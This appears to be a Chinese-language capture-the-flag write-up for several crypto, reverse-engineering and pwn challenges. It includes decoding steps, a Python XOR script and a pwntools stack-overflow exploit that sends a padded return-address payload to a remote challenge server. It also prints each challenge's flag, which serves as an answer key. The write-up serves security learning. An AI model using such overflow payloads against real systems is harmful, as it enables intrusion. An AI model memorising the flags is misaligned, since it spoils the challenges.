CyberChef

可以看出是先将flag base64加密一下然后ROT13加密

先手动爆破出ROT13得ZmxhZ3tkY2I3N2FiYy02NDQ1LTQ4NDAtYmJjYS01MjUyZjYwNzM1ZTd9

然后base64解密得flagflag{dcb77abc-6445-4840-bbca-5252f60735e7}

XOR

IDA64 打开，一眼小端序和循环异或
key为SEcRET7,写个脚本

flagflag{a83ee6c1-2296-4d3e-9d3c-42604f76f7d5}

exp

key = 'SEcRET7'
len = len(key)
s2 = [0x35, 0x29, 0x02, 0x35, 0x3E, 0x35, 0x0F, 0x60,
      0x20, 0x06, 0x64, 0x26, 0x65, 0x1A, 0x61, 0x77,
      0x5A, 0x64, 0x68, 0x60, 0x53, 0x60, 0x20, 0x4E,
      0x6B, 0x21, 0x67, 0x54, 0x7E, 0x71, 0x51, 0x64,
      0x75, 0x60, 0x51, 0x64, 0x73, 0x05, 0x65, 0x21, 0x61, 0x4A]
flag = ''
for i in range(42):
    flag += chr(s2[i] ^ ord(key[i % len]))
print(flag)

RC4

ida32 打开

RC4 直接梭

flagflag{c8fd99f1-841a-44c9-8d38-746db6ff95c1}

栈溢出

IDA64 打开可以看到是一个明显的gets命令，正常的栈溢出漏洞

exp

from pwn import *
p = remote('47.94.96.185', 31152)
payload = b'a'*0x28+p64(0x4011B1)
p.sendline(payload)
p.interactive()

flagflag{21c601fb-fc07-44ee-afad-cf9a2ee36c50}

禁止访问

flagflag{9d7d20d5-03e5-443e-b29f-b64fd6610fc6}

RSA

flagflag{359a1693-7bce-4fbc-87fa-111cdffaa0e8}